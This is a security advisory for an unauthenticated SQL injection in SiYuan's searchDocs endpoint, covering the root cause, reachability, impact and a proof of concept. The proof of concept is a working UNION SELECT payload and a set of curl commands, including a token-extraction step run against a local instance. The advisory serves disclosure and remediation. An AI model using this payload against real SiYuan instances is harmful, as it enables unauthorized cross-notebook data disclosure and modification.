Vulnerability GHSA-33jq-p8c2-q3q4
Summary
SiYuan: Unauthenticated SQL injection in searchDocs via unescaped keyword (publish mode): cross-notebook read/write with statement stacking
Details
Summary
The /api/filetree/searchDocs endpoint concatenates the caller-supplied search keyword directly into a SQL statement with no escaping and no parameter binding. The endpoint is gated by CheckAuth only reachable by the publish RoleReader token, and by the anonymous account when Publish.Auth.Enable is false. The resulting statement runs on a read-write SQLite handle through a driver that executes stacked (;-separated) statements, against the global blocks table spanning all cleartext notebooks. An unauthenticated request can therefore read and write database content across every non-encrypted notebook on the instance.
Details
Data flow, unescaped and unbound at every hop:
searchDocs(kernel/api/filetree.go):k := arg["k"].(string)passed straight tomodel.SearchDocs(k, …), no sanitization.SearchDocs(kernel/model/file.go): afterTrimSpaceandstrings.Fields, each token is spliced into a single-quotedLIKEliteral by concatenationcondition.WriteString("(hpath LIKE '%" + k + "%'"). No escaping, no''doubling, no bind placeholder.NAMFilter(kernel/conf/search.go): appends" OR name LIKE '%" + keyword + "%'"(andalias,memo) the same way, enabled by default.QueryRootBlockByCondition(kernel/sql/block_query.go):"SELECT *, … FROM blocks WHERE type = 'd' AND " + condition + " ORDER BY … LIMIT …"passed toquery(sqlStmt).
The only value-inspecting guard is ast.IsNodeIDPattern(keyword), which merely routes an exact-ID-shaped keyword to a different branch; a normal keyword falls through to the concatenation. strings.Fields prevents literal whitespace within a token this constrains payload construction but is not sanitization or confinement.
Driver / statement stacking. The driver is the vendored github.com/88250/go-sqlite3 (mattn fork), registered as sqlite3_extended. query() calls db.Query, and the driver's connection query implementation loops over ;-separated statements preparing and executing each in turn so a stacked statement executes for its side effects. SiYuan's CheckSingleStatement / CheckReadonlyStatement guards exist but are wired only into the explicit SQL endpoints (api/sql.go, cli, mcp); the searchDocs > query() path does not call them.
Handle. The DSN (kernel/model/database.go) sets _journal_mode=WAL&_synchronous=OFF&… with no mode=ro and no _query_only. It is the same read-write handle used for indexing Exec calls, so stacked INSERT/UPDATE/DELETE execute, and ATTACH is available. load_extension is not enabled in this build (no build tag / ConnectHook enabling it), so the ceiling is database read/write, not code execution.
Scope. The blocks table indexes every opened non-encrypted notebook. Encrypted notebooks use separate per-box databases and are excluded. Scope is therefore all cleartext notebook content on the instance cross-notebook, not publish-scoped.
Impact
An unauthenticated request (publish mode with auth disabled) or any publish RoleReader reaches an unescaped, unparameterized SQL concatenation on a read-write handle whose driver executes stacked statements, against a table spanning all cleartext notebooks. This permits cross-notebook disclosure of document content and, via statement stacking on the read-write handle, modification of database content (and ATTACH-reachable files). No admin role, no CSRF token, no write permission through the normal API is required; the publish surface alone is sufficient. Encrypted notebooks are not exposed. Code execution is not reachable in the default build (no load_extension).
Root cause
The keyword is split on whitespace and each token is spliced into a LIKE literal without escaping or binding:
SearchDocsbuilds each condition as(hpath LIKE '%<token>%' ...)(file.go:199).NAMFilterappendsOR name LIKE '%<token>%',alias,memothe same way (search.go:135-142).QueryRootBlockByConditionconcatenates that condition intoSELECT *, length(hpath) - length(replace(hpath, '/', '')) AS lv FROM blocks WHERE type = 'd' AND <condition> ORDER BY box DESC, lv ASC LIMIT <n>and callsquery()(block_query.go:74-75).query()callsdb.Query()with no call to the project's ownCheckSingleStatement/CheckReadonlyStatementguards, which are wired only intoapi/sql.go(the explicit SQL endpoints), not this path (database.go:1426-1436).
The only pre-sink check is ast.IsNodeIDPattern (file.go:179), which merely routes exact-ID-shaped input to a different (also concatenated) branch, it does not sanitize.
Reachability / auth tier
- Route middleware is
model.CheckAuthonly noCheckAdminRole. - The publish reverse proxy injects a token resolving to
RoleReader, or the anonymous account whenPublish.Auth.Enable=false. Both satisfyCheckAuth. - The handler applies no publish-access / read-only / role check, and
SearchDocsapplies no post-query scope filter. - Query targets the global
blockstable = all opened non-encrypted notebooks (cross-boundary). Encrypted notebooks use separate DBs and are excluded.
Proof of concept (read-only discloses sqlite_version())
Demonstrated against a local instance. Read-only: the PoC runs a single SELECT … UNION SELECT and surfaces the SQLite version string through the search response. No data is modified.
1. Prerequisites
- A local SiYuan kernel running (default
http://127.0.0.1:6806). - The API token from Settings > About > API token (omit if no access-auth code is set).
- One opened notebook id (17 chars), e.g. from
POST /api/notebook/lsNotebooks.
2. Why the payload is shaped this way
- The kernel places the keyword as
hpath LIKE '%<K>%', so the payload closes the string literal and the condition group, appends aUNION SELECT, and comments out the trailing%',ORDER BY, andLIMIT. - The keyword is whitespace-split (
strings.Fields), so literal spaces are replaced with/**/SQL comments. blockshas 21 columns; the query adds a computedlv, so theUNION SELECTmust supply 22 values. Only col 5 (Box) and col 6 (Path) matter: col 5 must equal an opened notebook id (result loop skips rows whose box is not openfile.go:230) and col 6 is returned verbatim as the responsepathfield.
3. PoC
-
Open the web UI once (unlocks + ensures a notebook is open)
-
Browser >
http://127.0.0.1:6806 -
Enter the access-auth code:
poctestcode -
Let it finish loading. A fresh instance opens with a default notebook in the left sidebar that's what the PoC needs (the injection surfaces through an open notebook). If the sidebar is empty, click + > New notebook, name it anything, and make sure it's open (bold, not greyed).
-
Grab the API token
docker exec siyuan-poc grep -o '"token":"[^"]*"' /siyuan/workspace/conf/conf.json
TOKEN="paste_the_token_value_here"
- Get the open notebook's ID
curl -s -X POST "http://127.0.0.1:6806/api/notebook/lsNotebooks" -H "Authorization: Token $TOKEN" Copy an id whose "closed":false, then: BOX_ID="paste_that_id_here"
- Build the request body
cat > body.json <<EOF
{"k":"poc%')/**/union/**/select/**/'poc','','poc','','$BOX_ID',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--"}
EOF
(The heredoc substitutes $BOX_ID for you, no manual editing.)
- Fire the injection
curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d @body.json | grep -o '"path":"[0-9][^"]*"' Expected: the SQLite version string, e.g. "path":"3.45.1", proof the keyword was executed as SQL. Screenshot this for the advisory.
- Confirm the row is genuinely injected (optional sanity check)
Run the same request with a benign keyword and confirm no version appears: curl -s -X POST "http://127.0.0.1:6806/api/filetree/searchDocs" -H "Content-Type: application/json" -H "Authorization: Token $TOKEN" -d '{"k":"poc"}' | grep -o '"path":"[0-9][^"]*"' # returns nothing The differential (version appears only with the crafted keyword) is clean evidence for the report.
Related Vulnerabilities
Other vulnerabilities affecting the same packages